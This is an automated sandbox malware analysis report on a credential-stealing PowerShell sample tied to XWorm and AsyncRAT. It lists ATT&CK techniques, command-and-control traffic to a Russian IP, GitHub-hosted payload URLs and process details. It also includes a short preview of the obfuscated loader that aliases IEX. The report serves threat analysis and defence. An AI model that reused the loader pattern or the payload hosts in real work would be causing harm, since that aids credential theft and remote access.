      Disable or Modify Tools
      OS Credential Dumping421
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      321
      Virtualization/Sandbox Evasion
      LSASS Memory2
      Process Discovery
      Remote Desktop Protocol1
      Data from Local System
      1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)212
      Process Injection
      Security Account Manager321
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares1
      Clipboard Data
      SteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials213
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      92.255.57.112.ps13%ReversingLabs
      92.255.57.112.ps17%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://crl.microsoft.c0%Avira URL Cloudsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://stackoverflow.com/q/14436606/23354RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllRegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000000.00000002.157400544873.00000228C7995000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeRegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://stackoverflow.com/q/2152978/23354rCannotRegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/11564914/23354;RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeRegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Pester/Pesterhpowershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.microsoft.cpowershell.exe, 00000000.00000002.157428012843.00000228DEB69000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.quovadis.bm0powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000339D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://oneget.orgpowershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            92.255.57.112
                                                            unknownRussian Federation
                                                            42253TELSPRUtrue
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1591628
                                                            Start date and time:2025-01-15 08:30:58 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 41s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Run name:Suspected VM Detection
                                                            Number of analysed new started processes analysed:4
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:92.255.57.112.ps1
                                                            Detection:MAL
                                                            Classification:mal88.spyw.evad.winPS1@4/5@0/1
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 79%
                                                            • Number of executed functions: 67
                                                            • Number of non-executed functions: 2
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .ps1
                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                            • Execution Graph export aborted for target RegSvcs.exe, PID 7136 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 6176 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            TimeTypeDescription
                                                            02:33:03API Interceptor5x Sleep call for process: powershell.exe modified
                                                            02:33:10API Interceptor3652825x Sleep call for process: RegSvcs.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            92.255.57.11292.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                              book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                TELSPRUWZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                • 92.255.57.155
                                                                WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                • 92.255.57.155
                                                                2.ps1Get hashmaliciousUnknownBrowse
                                                                • 92.255.57.155
                                                                2.ps1Get hashmaliciousUnknownBrowse
                                                                • 92.255.57.155
                                                                92.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                                • 92.255.57.112
                                                                book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                • 92.255.57.112
                                                                http://92.255.57.155/1/1.pngGet hashmaliciousUnknownBrowse
                                                                • 92.255.57.155
                                                                92.255.57.155.ps1Get hashmaliciousXWormBrowse
                                                                • 92.255.57.155
                                                                png2obj1_XClient.exeGet hashmaliciousXWormBrowse
                                                                • 92.255.57.155
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7464161430826683
                                                                Encrypted:false
                                                                SSDEEP:96:6P1KZCvG2Y+kvhkvCCtlG+crIEH3D+crI9H38:6P1w09cEtcEq
                                                                MD5:8F502D164F0FDE13A77B53281D38001E
                                                                SHA1:ECDCC194A481A1723CD8AF84FDA66AB829A21CE0
                                                                SHA-256:6EED7C395A0B162F61F50F9E75B87AA14800F332D2809E51AE0BEC34DF1636A3
                                                                SHA-512:1E245C8E1C36369F6C57E9DA5A71525A7CB71EC73CFE38AE4F40DCE7F47B3D2C45720763B0DBE61C2DD0F9BFD3070C87C8F13CBA14701032DBC2D206E46BDF1D
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...s...g..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S.....F..g......g......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S./Z.<....B......................A!.A.p.p.D.a.t.a...B.V.1...../Z.<..Roaming.@......"S./Z.<....D......................H/.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S./Z.<....E.......................(.M.i.c.r.o.s.o.f.t.....V.1...../Z....Windows.@......"S./Z.<....F......................`..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`/Z......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`/Z......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S..Ze.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S./Z"<....i...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7464161430826683
                                                                Encrypted:false
                                                                SSDEEP:96:6P1KZCvG2Y+kvhkvCCtlG+crIEH3D+crI9H38:6P1w09cEtcEq
                                                                MD5:8F502D164F0FDE13A77B53281D38001E
                                                                SHA1:ECDCC194A481A1723CD8AF84FDA66AB829A21CE0
                                                                SHA-256:6EED7C395A0B162F61F50F9E75B87AA14800F332D2809E51AE0BEC34DF1636A3
                                                                SHA-512:1E245C8E1C36369F6C57E9DA5A71525A7CB71EC73CFE38AE4F40DCE7F47B3D2C45720763B0DBE61C2DD0F9BFD3070C87C8F13CBA14701032DBC2D206E46BDF1D
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...s...g..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S.....F..g......g......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S./Z.<....B......................A!.A.p.p.D.a.t.a...B.V.1...../Z.<..Roaming.@......"S./Z.<....D......................H/.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S./Z.<....E.......................(.M.i.c.r.o.s.o.f.t.....V.1...../Z....Windows.@......"S./Z.<....F......................`..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`/Z......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`/Z......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S..Ze.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S./Z"<....i...........
                                                                File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                                Entropy (8bit):5.908191267301583
                                                                TrID:
                                                                  File name:92.255.57.112.ps1
                                                                  File size:526'214 bytes
                                                                  MD5:7b7bab781f4b30aee1289f36a01606a0
                                                                  SHA1:1b7a8d8302afa6f27f27d3d313865c2a4af61bdd
                                                                  SHA256:e82de6b368baabcc81ce3316a319f27173e82b9c2e94a043bf42b62458dc5a98
                                                                  SHA512:6bdbed54c70d1fbba9e5d3ef620a89c3a9a285177d2a646ecf478808d6b15372e6e3ca1b59c76a36f7a8a2a63c245b4eb6ab4a5a879ecc06446ae123ab62a927
                                                                  SSDEEP:12288:eFwowo0VN2VOhllXKS2Utye+jF2RZQcqNStpIOe0Ti0dBmEv7:2S37hloSTtKF2RZQHGuvo
                                                                  TLSH:D3B401731617FC8F67AF1F89E9003B952C7C943B6B1C4058F9C90BA990EA520DE6AD74
                                                                  File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAA
                                                                  Icon Hash:3270d6baae77db44
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-15T08:33:11.565512+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert192.255.57.11256001192.168.11.2049780TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 15, 2025 08:33:10.632803917 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:10.857168913 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:10.857480049 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:10.862202883 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:11.086667061 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:11.086824894 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:11.334029913 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:11.334068060 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:11.334259033 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:11.336519957 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:11.565511942 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:11.607212067 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:13.122584105 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:13.400027990 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:13.400243998 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:13.665625095 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:47.600058079 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:47.877891064 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:47.878153086 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:48.103578091 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:48.145963907 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:48.370412111 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:48.374840975 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:48.643074989 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:33:48.643291950 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:33:48.909614086 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:34:23.610824108 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:34:23.877226114 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:34:23.877374887 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:34:24.102623940 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:34:24.153666019 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:34:24.378115892 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:34:24.380059958 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:34:24.658353090 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:34:24.658639908 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:34:24.924118996 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:34:59.621026039 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:34:59.888185024 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:34:59.888303041 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:00.113588095 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:00.161370993 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:00.385643959 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:00.387391090 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:00.653533936 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:00.653671026 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:00.919259071 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:12.041098118 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:12.307840109 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:12.308002949 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:12.533584118 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:12.580559015 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:12.805027008 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:12.805572987 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:13.077979088 CET560014978092.255.57.112192.168.11.20
                                                                  Jan 15, 2025 08:35:13.078217983 CET4978056001192.168.11.2092.255.57.112
                                                                  Jan 15, 2025 08:35:13.350069046 CET560014978092.255.57.112192.168.11.20

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:02:33:02
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1"
                                                                  Imagebase:0x7ff6bcfb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:02:33:02
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9280000
                                                                  File size:875'008 bytes
                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:02:33:04
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                  Imagebase:0x9d0000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430775349.00007FF853F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853F90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853f90000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1a2e97a3efbb2845744dcdbd4a3c1b2ded2c0995d2728bfd86b33fd4b0adc9c
                                                                    • Instruction ID: c1c8d2a50a59c02e3df0d00805e81c21da1a3c7796ed0580b7fbe4cd77b0936c
                                                                    • Opcode Fuzzy Hash: f1a2e97a3efbb2845744dcdbd4a3c1b2ded2c0995d2728bfd86b33fd4b0adc9c
                                                                    • Instruction Fuzzy Hash: EAB2F332E1DB8A4FE7A69A2858555B57BE3EF462A0B0C01FFD04DD7193D918EC06C382
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4457ef3362a05a2a2a01276703aa42b57978caf3b8806054715591ea6fdbb8b1
                                                                    • Instruction ID: ffe6ce88861faf2174e4b4ec70710b75a2c6ff685b5f64a62ba76d2d1f271bd6
                                                                    • Opcode Fuzzy Hash: 4457ef3362a05a2a2a01276703aa42b57978caf3b8806054715591ea6fdbb8b1
                                                                    • Instruction Fuzzy Hash: 27416923E1CAB64BE3116A3C78160FD7F92EF913B471C4077C188AB587EC28A8458385
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2c11ef6f20048542b239441f40bf7bd69cbb19cae04a16570a12baa3284b2e2
                                                                    • Instruction ID: ab0ff797c1d826a6dbe5395183db5baddbf4a1294df10eafde372512d0ab6e0a
                                                                    • Opcode Fuzzy Hash: c2c11ef6f20048542b239441f40bf7bd69cbb19cae04a16570a12baa3284b2e2
                                                                    • Instruction Fuzzy Hash: AB21F831A1CA690FD781FB2CA86A2FABBD1EF95365B08007BD54CD7193ED2558818381
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.157430194741.00007FF853EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF853EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff853ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f7b784197025fde0e1c1f41fb264ee87d323bcb4f61a4d527f39ad22688a8d80
